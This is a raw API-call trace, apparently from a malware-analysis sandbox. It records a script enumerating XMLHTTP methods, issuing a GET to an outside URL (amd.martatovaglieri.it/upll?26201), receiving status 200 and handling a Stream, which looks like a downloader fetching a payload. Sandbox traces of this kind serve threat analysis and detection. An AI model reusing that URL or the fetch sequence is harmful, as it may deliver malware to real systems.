	[0053.306] CoTaskMemAlloc (cb=0x10) returned 0x1505fb98420
	[0053.306] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=5, rgBstrNames=0x1505fb98420, cMaxNames=0x2, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fb98420*="send", pcNames=0x184c18de18*=0x2) returned 0x0
	[0053.306] SysStringByteLen (bstr="send") returned 0x8
	[0053.306] SysStringByteLen (bstr="send") returned 0x8
	[0053.306] SysStringByteLen (bstr="varBody") returned 0xe
	[0053.306] SysStringByteLen (bstr="varBody") returned 0xe
	[0053.306] CoTaskMemFree (pv=0x1505fb98420) 
	[0053.306] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.306] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0xc, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.306] CoTaskMemAlloc (cb=0x8) returned 0x1505fbde370
	[0053.306] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=6, rgBstrNames=0x1505fbde370, cMaxNames=0x1, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fbde370*="abort", pcNames=0x184c18de18*=0x1) returned 0x0
	[0053.306] SysStringByteLen (bstr="abort") returned 0xa
	[0053.306] SysStringByteLen (bstr="abort") returned 0xa
	[0053.306] CoTaskMemFree (pv=0x1505fbde370) 
	[0053.307] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0xd, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.307] CoTaskMemAlloc (cb=0x8) returned 0x1505fbde220
	[0053.307] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=7, rgBstrNames=0x1505fbde220, cMaxNames=0x1, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fbde220*="status", pcNames=0x184c18de18*=0x1) returned 0x0
	[0053.307] SysStringByteLen (bstr="status") returned 0xc
	[0053.307] SysStringByteLen (bstr="status") returned 0xc
	[0053.307] CoTaskMemFree (pv=0x1505fbde220) 
	[0053.307] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0xe, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.307] CoTaskMemAlloc (cb=0x8) returned 0x1505fbde340
	[0053.307] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=8, rgBstrNames=0x1505fbde340, cMaxNames=0x1, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fbde340*="statusText", pcNames=0x184c18de18*=0x1) returned 0x0
	[0053.307] SysStringByteLen (bstr="statusText") returned 0x14
	[0053.307] SysStringByteLen (bstr="statusText") returned 0x14
	[0053.307] CoTaskMemFree (pv=0x1505fbde340) 
	[0053.307] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0xf, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.307] CoTaskMemAlloc (cb=0x8) returned 0x1505fbde440
	[0053.307] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=9, rgBstrNames=0x1505fbde440, cMaxNames=0x1, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fbde440*="responseXML", pcNames=0x184c18de18*=0x1) returned 0x0
	[0053.307] SysStringByteLen (bstr="responseXML") returned 0x16
	[0053.307] SysStringByteLen (bstr="responseXML") returned 0x16
	[0053.307] CoTaskMemFree (pv=0x1505fbde440) 
	[0053.307] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x10, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.307] CoTaskMemAlloc (cb=0x8) returned 0x1505fbde300
	[0053.307] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=10, rgBstrNames=0x1505fbde300, cMaxNames=0x1, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fbde300*="responseText", pcNames=0x184c18de18*=0x1) returned 0x0
	[0053.307] SysStringByteLen (bstr="responseText") returned 0x18
	[0053.307] SysStringByteLen (bstr="responseText") returned 0x18
	[0053.307] CoTaskMemFree (pv=0x1505fbde300) 
	[0053.307] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.307] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x11, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.307] CoTaskMemAlloc (cb=0x8) returned 0x1505fbde220
	[0053.307] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=11, rgBstrNames=0x1505fbde220, cMaxNames=0x1, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fbde220*="responseBody", pcNames=0x184c18de18*=0x1) returned 0x0
	[0053.307] SysStringByteLen (bstr="responseBody") returned 0x18
	[0053.308] SysStringByteLen (bstr="responseBody") returned 0x18
	[0053.308] CoTaskMemFree (pv=0x1505fbde220) 
	[0053.308] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.308] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x12, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.308] CoTaskMemAlloc (cb=0x8) returned 0x1505fbde3f0
	[0053.308] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=12, rgBstrNames=0x1505fbde3f0, cMaxNames=0x1, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fbde3f0*="responseStream", pcNames=0x184c18de18*=0x1) returned 0x0
	[0053.308] SysStringByteLen (bstr="responseStream") returned 0x1c
	[0053.308] SysStringByteLen (bstr="responseStream") returned 0x1c
	[0053.308] CoTaskMemFree (pv=0x1505fbde3f0) 
	[0053.308] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.308] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x13, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.308] CoTaskMemAlloc (cb=0x8) returned 0x1505fbde160
	[0053.308] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=13, rgBstrNames=0x1505fbde160, cMaxNames=0x1, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fbde160*="readyState", pcNames=0x184c18de18*=0x1) returned 0x0
	[0053.308] SysStringByteLen (bstr="readyState") returned 0x14
	[0053.308] SysStringByteLen (bstr="readyState") returned 0x14
	[0053.308] CoTaskMemFree (pv=0x1505fbde160) 
	[0053.308] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.308] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x14, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.308] CoTaskMemAlloc (cb=0x10) returned 0x1505fb98420
	[0053.308] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=14, rgBstrNames=0x1505fb98420, cMaxNames=0x2, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fb98420*="onreadystatechange", pcNames=0x184c18de18*=0x1) returned 0x0
	[0053.308] SysStringByteLen (bstr="onreadystatechange") returned 0x24
	[0053.308] SysStringByteLen (bstr="onreadystatechange") returned 0x24
	[0053.308] CoTaskMemFree (pv=0x1505fb98420) 
	[0053.308] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.308] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x15, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.308] CoTaskMemAlloc (cb=0x28) returned 0x1505fb136d0
	[0053.308] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=15, rgBstrNames=0x1505fb136d0, cMaxNames=0x5, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fb136d0*="setTimeouts", pcNames=0x184c18de18*=0x5) returned 0x0
	[0053.308] SysStringByteLen (bstr="setTimeouts") returned 0x16
	[0053.308] SysStringByteLen (bstr="setTimeouts") returned 0x16
	[0053.308] SysStringByteLen (bstr="resolveTimeout") returned 0x1c
	[0053.308] SysStringByteLen (bstr="resolveTimeout") returned 0x1c
	[0053.308] SysStringByteLen (bstr="connectTimeout") returned 0x1c
	[0053.308] SysStringByteLen (bstr="connectTimeout") returned 0x1c
	[0053.308] SysStringByteLen (bstr="sendTimeout") returned 0x16
	[0053.308] SysStringByteLen (bstr="sendTimeout") returned 0x16
	[0053.308] SysStringByteLen (bstr="receiveTimeout") returned 0x1c
	[0053.308] SysStringByteLen (bstr="receiveTimeout") returned 0x1c
	[0053.309] CoTaskMemFree (pv=0x1505fb136d0) 
	[0053.309] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x16, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.309] CoTaskMemAlloc (cb=0x10) returned 0x1505fb98420
	[0053.309] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=16, rgBstrNames=0x1505fb98420, cMaxNames=0x2, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fb98420*="waitForResponse", pcNames=0x184c18de18*=0x2) returned 0x0
	[0053.309] SysStringByteLen (bstr="waitForResponse") returned 0x1e
	[0053.309] SysStringByteLen (bstr="waitForResponse") returned 0x1e
	[0053.309] SysStringByteLen (bstr="timeoutInSeconds") returned 0x20
	[0053.309] SysStringByteLen (bstr="timeoutInSeconds") returned 0x20
	[0053.309] CoTaskMemFree (pv=0x1505fb98420) 
	[0053.309] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x17, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.309] CoTaskMemAlloc (cb=0x10) returned 0x1505fb98420
	[0053.309] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=17, rgBstrNames=0x1505fb98420, cMaxNames=0x2, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fb98420*="getOption", pcNames=0x184c18de18*=0x2) returned 0x0
	[0053.309] SysStringByteLen (bstr="getOption") returned 0x12
	[0053.309] SysStringByteLen (bstr="getOption") returned 0x12
	[0053.309] SysStringByteLen (bstr="option") returned 0xc
	[0053.309] SysStringByteLen (bstr="option") returned 0xc
	[0053.309] CoTaskMemFree (pv=0x1505fb98420) 
	[0053.309] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.309] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x18, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.309] CoTaskMemAlloc (cb=0x18) returned 0x1505fb98420
	[0053.309] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=18, rgBstrNames=0x1505fb98420, cMaxNames=0x3, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fb98420*="setOption", pcNames=0x184c18de18*=0x3) returned 0x0
	[0053.309] SysStringByteLen (bstr="setOption") returned 0x12
	[0053.309] SysStringByteLen (bstr="setOption") returned 0x12
	[0053.310] SysStringByteLen (bstr="option") returned 0xc
	[0053.310] SysStringByteLen (bstr="option") returned 0xc
	[0053.310] SysStringByteLen (bstr="value") returned 0xa
	[0053.310] SysStringByteLen (bstr="value") returned 0xa
	[0053.310] CoTaskMemFree (pv=0x1505fb98420) 
	[0053.310] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x19, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.310] CoTaskMemAlloc (cb=0x20) returned 0x1505fb13e20
	[0053.310] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=19, rgBstrNames=0x1505fb13e20, cMaxNames=0x4, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fb13e20*="setProxy", pcNames=0x184c18de18*=0x4) returned 0x0
	[0053.310] SysStringByteLen (bstr="setProxy") returned 0x10
	[0053.310] SysStringByteLen (bstr="setProxy") returned 0x10
	[0053.310] SysStringByteLen (bstr="proxySetting") returned 0x18
	[0053.310] SysStringByteLen (bstr="proxySetting") returned 0x18
	[0053.310] SysStringByteLen (bstr="varProxyServer") returned 0x1c
	[0053.310] SysStringByteLen (bstr="varProxyServer") returned 0x1c
	[0053.310] SysStringByteLen (bstr="varBypassList") returned 0x1a
	[0053.310] SysStringByteLen (bstr="varBypassList") returned 0x1a
	[0053.310] CoTaskMemFree (pv=0x1505fb13e20) 
	[0053.310] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.310] ITypeInfo:RemoteGetFuncDesc (in: This=0x1505fc21fe8, index=0x1a, ppFuncDesc=0x184c18de28, pDummy=0x0 | out: ppFuncDesc=0x184c18de28, pDummy=0x0) returned 0x0
	[0053.310] CoTaskMemAlloc (cb=0x18) returned 0x1505fb98420
	[0053.310] ITypeInfo:RemoteGetNames (in: This=0x1505fc21fe8, memid=20, rgBstrNames=0x1505fb98420, cMaxNames=0x3, pcNames=0x184c18de18 | out: rgBstrNames=0x1505fb98420*="setProxyCredentials", pcNames=0x184c18de18*=0x3) returned 0x0
	[0053.310] SysStringByteLen (bstr="setProxyCredentials") returned 0x26
	[0053.310] SysStringByteLen (bstr="setProxyCredentials") returned 0x26
	[0053.311] SysStringByteLen (bstr="bstrUserName") returned 0x18
	[0053.311] SysStringByteLen (bstr="bstrUserName") returned 0x18
	[0053.311] SysStringByteLen (bstr="bstrPassword") returned 0x18
	[0053.311] SysStringByteLen (bstr="bstrPassword") returned 0x18
	[0053.311] CoTaskMemFree (pv=0x1505fb98420) 
	[0053.311] ITypeInfo:LocalReleaseFuncDesc (This=0x1505fc21fe8) returned 0x0
	[0053.518] CoCreateGuid (in: pguid=0x184c18bc28 | out: pguid=0x184c18bc28*(Data1=0xcce080a9, Data2=0xb0aa, Data3=0x4683, Data4=([0]=0x95, [1]=0xb7, [2]=0xbb, [3]=0x40, [4]=0x97, [5]=0x9, [6]=0xd, [7]=0xec))) returned 0x0
	[0053.582] CoCreateGuid (in: pguid=0x184c18bba8 | out: pguid=0x184c18bba8*(Data1=0x3888eef0, Data2=0x8f4, Data3=0x4a97, Data4=([0]=0xb6, [1]=0x42, [2]=0x30, [3]=0x23, [4]=0xc5, [5]=0x3, [6]=0x89, [7]=0x53))) returned 0x0
	[0053.592] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1505fb98b20
	[0053.598] CoGetContextToken (in: pToken=0x184c18d920 | out: pToken=0x184c18d920) returned 0x0
	[0053.598] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf8951098*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d9f0 | out: ppvObject=0x184c18d9f0*=0x150600057b0) returned 0x0
	[0053.603] XMLHTTP:IDispatch:Invoke (in: This=0x150600057b0, dispIdMember=1, riid=0x1505fb98b20*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x184c18e188*(rgvarg=([0]=0x184c18e128*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x184c18e140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://amd.martatovaglieri.it/upll?26201", varVal2=0x0), [2]=0x184c18e158*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x184c18e110, pExcepInfo=0x184c18e0d0, puArgErr=0x184c18e0c8 | out: pDispParams=0x184c18e188*(rgvarg=([0]=0x184c18e128*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x184c18e140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://amd.martatovaglieri.it/upll?26201", varVal2=0x0), [2]=0x184c18e158*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x184c18e110*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pExcepInfo=0x184c18e0d0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x184c18e0c8*=0x0) returned 0x0
	[0054.357] XMLHTTP:IUnknown:Release (This=0x150600057b0) returned 0x2
	[0054.465] CoGetContextToken (in: pToken=0x184c18e010 | out: pToken=0x184c18e010) returned 0x0
	[0054.465] CoGetContextToken (in: pToken=0x184c18df10 | out: pToken=0x184c18df10) returned 0x0
	[0054.465] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18e070*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18e040 | out: ppvObject=0x184c18e040*=0x0) returned 0x80004002
	[0054.593] CoGetContextToken (in: pToken=0x184c18dfc0 | out: pToken=0x184c18dfc0) returned 0x0
	[0054.593] CoGetContextToken (in: pToken=0x184c18dec0 | out: pToken=0x184c18dec0) returned 0x0
	[0054.593] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18e020*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18dff0 | out: ppvObject=0x184c18dff0*=0x0) returned 0x80004002
	[0054.595] CoGetContextToken (in: pToken=0x184c18e000 | out: pToken=0x184c18e000) returned 0x0
	[0054.595] CoGetContextToken (in: pToken=0x184c18df00 | out: pToken=0x184c18df00) returned 0x0
	[0054.595] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18e060*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18e030 | out: ppvObject=0x184c18e030*=0x0) returned 0x80004002
	[0054.906] CoGetContextToken (in: pToken=0x184c18dc20 | out: pToken=0x184c18dc20) returned 0x0
	[0054.906] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf8951098*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18dcf0 | out: ppvObject=0x184c18dcf0*=0x150600057b0) returned 0x0
	[0054.906] XMLHTTP:IDispatch:Invoke (in: This=0x150600057b0, dispIdMember=5, riid=0x1505fb98b20*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x184c18e428*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x184c18e410, pExcepInfo=0x184c18e3d0, puArgErr=0x184c18e3c8 | out: pDispParams=0x184c18e428*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x184c18e410*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pExcepInfo=0x184c18e3d0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x184c18e3c8*=0x0) returned 0x0
	[0057.183] XMLHTTP:IUnknown:Release (This=0x150600057b0) returned 0x2
	[0057.185] CoGetContextToken (in: pToken=0x184c18e030 | out: pToken=0x184c18e030) returned 0x0
	[0057.185] CoGetContextToken (in: pToken=0x184c18df30 | out: pToken=0x184c18df30) returned 0x0
	[0057.185] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18e090*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18e060 | out: ppvObject=0x184c18e060*=0x0) returned 0x80004002
	[0057.200] CoGetContextToken (in: pToken=0x184c18dfc0 | out: pToken=0x184c18dfc0) returned 0x0
	[0057.201] CoGetContextToken (in: pToken=0x184c18dec0 | out: pToken=0x184c18dec0) returned 0x0
	[0057.201] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18e020*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18dff0 | out: ppvObject=0x184c18dff0*=0x0) returned 0x80004002
	[0057.202] CoGetContextToken (in: pToken=0x184c18e000 | out: pToken=0x184c18e000) returned 0x0
	[0057.202] CoGetContextToken (in: pToken=0x184c18df00 | out: pToken=0x184c18df00) returned 0x0
	[0057.202] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x184c18e060*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18e030 | out: ppvObject=0x184c18e030*=0x0) returned 0x80004002
	[0057.293] CoGetContextToken (in: pToken=0x184c18dbc0 | out: pToken=0x184c18dbc0) returned 0x0
	[0057.293] XMLHTTP:IUnknown:QueryInterface (in: This=0x150600057f0, riid=0x7ffbf8951098*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18dc90 | out: ppvObject=0x184c18dc90*=0x150600057b0) returned 0x0
	[0057.293] XMLHTTP:IDispatch:Invoke (in: This=0x150600057b0, dispIdMember=7, riid=0x1505fb98b20*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x184c18e3c8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x184c18e3b0, pExcepInfo=0x184c18e370, puArgErr=0x184c18e368 | out: pDispParams=0x184c18e3c8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x184c18e3b0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x184c18e370*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x184c18e368*=0x0) returned 0x0
	[0057.294] XMLHTTP:IUnknown:Release (This=0x150600057b0) returned 0x2
	[0057.372] CoGetContextToken (in: pToken=0x184c18df80 | out: pToken=0x184c18df80) returned 0x0
	[0057.372] CoGetContextToken (in: pToken=0x184c18de80 | out: pToken=0x184c18de80) returned 0x0
	[0057.372] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfe0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18dfb0 | out: ppvObject=0x184c18dfb0*=0x0) returned 0x80004002
	[0057.384] CoGetContextToken (in: pToken=0x184c18df30 | out: pToken=0x184c18df30) returned 0x0
	[0057.384] CoGetContextToken (in: pToken=0x184c18de30 | out: pToken=0x184c18de30) returned 0x0
	[0057.384] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18df90*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18df60 | out: ppvObject=0x184c18df60*=0x0) returned 0x80004002
	[0057.385] CoGetContextToken (in: pToken=0x184c18df70 | out: pToken=0x184c18df70) returned 0x0
	[0057.385] CoGetContextToken (in: pToken=0x184c18de70 | out: pToken=0x184c18de70) returned 0x0
	[0057.385] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfd0*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x184c18dfa0 | out: ppvObject=0x184c18dfa0*=0x0) returned 0x80004002
	[0057.411] CoGetContextToken (in: pToken=0x184c18df50 | out: pToken=0x184c18df50) returned 0x0
	[0057.411] CoGetContextToken (in: pToken=0x184c18de50 | out: pToken=0x184c18de50) returned 0x0
	[0057.411] Stream:IUnknown:QueryInterface (in: This=0x1505fbce220, riid=0x184c18dfb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18df80 | out: ppvObject=0x184c18df80*=0x1505fbce220) returned 0x0
	[0057.411] Stream:IUnknown:AddRef (This=0x1505fbce220) returned 0x3
	[0057.411] Stream:IUnknown:Release (This=0x1505fbce220) returned 0x2
	[0057.412] Stream:IDispatch:GetTypeInfoCount (in: This=0x1505fbce220, pctinfo=0x184c18e028 | out: pctinfo=0x184c18e028) returned 0x0
	[0057.412] Stream:IDispatch:GetTypeInfo (in: This=0x1505fbce220, iTInfo=0x0, lcid=0x0, ppTInfo=0x184c18e020 | out: ppTInfo=0x184c18e020*=0x1505fc6d4f8) returned 0x0
	[0057.423] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc6d4f8, riid=0x7ffbf89265c8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x184c18d920 | out: ppvObject=0x184c18d920*=0x1505fc6d4f8) returned 0x0
	[0057.423] XMLHTTP:IUnknown:QueryInterface (in: This=0x1505fc6d4f8, riid=0x7ffbf8960b40*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x184c18d9b0 | out: ppvObject=0x184c18d9b0*=0x0) returned 0x80004002
